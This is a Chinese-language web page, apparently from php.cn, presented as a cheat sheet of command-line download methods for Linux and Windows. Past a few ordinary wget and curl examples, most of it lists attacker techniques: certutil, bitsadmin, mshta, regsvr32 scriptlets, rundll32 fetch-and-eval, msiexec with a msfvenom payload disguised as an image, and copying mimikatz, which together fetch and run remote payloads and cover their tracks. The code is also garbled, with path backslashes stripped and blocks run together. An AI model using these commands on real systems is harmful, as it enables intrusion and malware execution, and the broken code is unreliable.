0x01 Linux2.1 Wget直接下载:代码语言:javascript代码运行次数:0运行复制
<pre class="brush:php;toolbar:false;">wget http://www.sample-videos.com/video/mp4/big.mp4
<pre class="brush:php;toolbar:false;">wget -b http://www.sample-videos.com/video/mp4/big.mp4
<pre class="brush:php;toolbar:false;">wget -c http://www.sample-videos.com/video/mp4/big.mp4
<pre class="brush:php;toolbar:false;">wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
<pre class="brush:php;toolbar:false;">curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4
<pre class="brush:php;toolbar:false;">apt-get install axal
<pre class="brush:php;toolbar:false;">axel http://www.sample-videos.com/video/mp4/big.mp4
<pre class="brush:php;toolbar:false;">apt-get install aria2
<pre class="brush:php;toolbar:false;">aria2c http://www.sample-videos.com/video/mp4/big.mp4
<pre class="brush:php;toolbar:false;">#!perl#!/usr/bin/perluse LWP::Simple;getstore("http://domain/file", "file");perl test.pl
<pre class="brush:php;toolbar:false;">#!python#!/usr/bin/pythonimport urllib2u = urlliburlopen('http://domain/file')localFile = open('local_file', 'w')localFile.write(u.read())localFile.close()<pre class="brush:php;toolbar:false;">#!ruby#!/usr/bin/rubyrequire 'net/http'Net::HTTP.start("www.domain.com") { |http|r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) }}ruby test.rb
<pre class="brush:php;toolbar:false;">#!/usr/bin/php<?php $data = @file("http://example.com/file"); $lf = "local_file"; $fh = fopen($lf, 'w'); fwrite($fh, $data[0]); fclose($fh);?>php test.php
<pre class="brush:php;toolbar:false;">ftp 11usernamepasswordget fileexit
<pre class="brush:php;toolbar:false;">ftp 192.168.3.2输入用户名和密码后lcd E:ile # 进入E盘下的file目录cd www # 进入服务器上的www目录get access.log # 将服务器上的access.log下载到E:ile
<pre class="brush:php;toolbar:false;">cat file | nc -l 1234
<pre class="brush:php;toolbar:false;">nc host_ip 1234 > file
<pre class="brush:php;toolbar:false;">$p = New-Object System.Net.WebClient$p.DownloadFile("http://domain/file" "C:%homepath%ile")<pre class="brush:php;toolbar:false;">copy 92.168.3.1c$ est.exe E:ile
<pre class="brush:php;toolbar:false;">cmd.exe /k < webdavserverolderatchfile.txt
<pre class="brush:php;toolbar:false;">certutil -urlcache -split -f http://192.168.3.1/test.exe file.execertutil -urlcache -split -f http://192.168.3.1/test.exe delete #删除缓存certutil -verifyctl -split -f -split http://192.168.3.1/test.exe#此条命令,会将原文件下载成为临时 bin 文件,把名字改回来一样可以正常运行
<pre class="brush:php;toolbar:false;">certutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
<pre class="brush:php;toolbar:false;">Set args = Wscript.ArgumentsUrl = "http://domain/file"dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")dim bStrm: Set bStrm = createobject("Adodb.Stream")xHttp.Open "GET", Url, FalsexHttp.Sendwith bStrm .type = 1 ' .open .write xHttp.responseBody .savetofile " C:%homepath%ile", 2 'end withcscript test.vbs
<pre class="brush:php;toolbar:false;">tftp -i IP地址 PUT C:%homepath%ile 远程存放位置
<pre class="brush:php;toolbar:false;">tftp -i IP地址 GET C:%homepath%ile 本地存放位置
<pre class="brush:php;toolbar:false;">bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\phpstudy_pro\WWW\b.ps1"bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:ile est.txtbitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:ile est.txt
<pre class="brush:php;toolbar:false;">msiexec /q /i http://192.168.3.1/calc.png
<pre class="brush:php;toolbar:false;">msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png
<pre class="brush:php;toolbar:false;">C:WindowsMicrosoft.NETFramework2.0.50727> caspol -s offC:WindowsMicrosoft.NETFramework2.0.50727> IEExec http://192.168.3.1/test.exe
<pre class="brush:php;toolbar:false;">C:python27python.exe -c “import urllib2; exec urllib2.urlopen(‘http://192.168.3.1/test.zip’).read();”
<pre class="brush:php;toolbar:false;">mshta http://192.168.3.1/run.hta
<pre class="brush:php;toolbar:false;"><HTML> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"><HEAD> <script language="VBScript">Window.ReSizeTo 0, 0Window.moveTo -2000,-2000Set objShell = CreateObject("Wscript.Shell")objShell.Run "cmd.exe /c net user" // 这里填写命令self.close</script><body>demo</body></HEAD> </HTML><pre class="brush:php;toolbar:false;">mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))<pre class="brush:php;toolbar:false;">rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%<pre class="brush:php;toolbar:false;">regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll
<pre class="brush:php;toolbar:false;"><?XML version="1.0"?><scriptlet><registration progid="ShortJSRAT" classid="{10001111-0000-0000-0000-0000FEEDACDC}" > <!-- Learn from Casey Smith @subTee --> <script language="JScript"> <![CDATA[ ps = "cmd.exe /c calc.exe"; new ActiveXObject("WScript.Shell").Run(ps,0,true); ]]></script></registration></scriptlet><pre class="brush:php;toolbar:false;">regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll
<pre class="brush:php;toolbar:false;">net use x: \127.0.0.1share /user:example.comuserID myPassword
<pre class="brush:php;toolbar:false;">PS > .ExetoText.ps1 evil.exe evil.txt
<pre class="brush:php;toolbar:false;">PS > .TexttoExe.ps1 evil.text evil.exe
<pre class="brush:php;toolbar:false;">esentutl.exe /y "\172.16.249.149share mimikatz_trunk.zip" /d"C:UsersPublicmimikatz_trunk.zip" /0extrac32.exe /Y /C \172.16.249.149share est.txt C:UsersPublic est.txt

<pre class="brush:php;toolbar:false;">set "SYSTEMROOT=C:ProgramData" && cmd /c desktopimgdownldr.exe /lockscreenurl:http://url/xxx.exe /eventName:desktopimgdownldr

<pre class="brush:php;toolbar:false;">C:ProgramDataPersonalizationLockScreenImagex_%random%.exe.

<pre class="brush:php;toolbar:false;">set "SYSTEMROOT=C:ProgramData" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://url/file.exe /eventName:desktopimgdownldr && reg delete HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPersonalizationCSP /f
以上就是Linux+Windows命令行终端下载指令大全的详细内容,更多请关注php中文网其它相关文章!
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号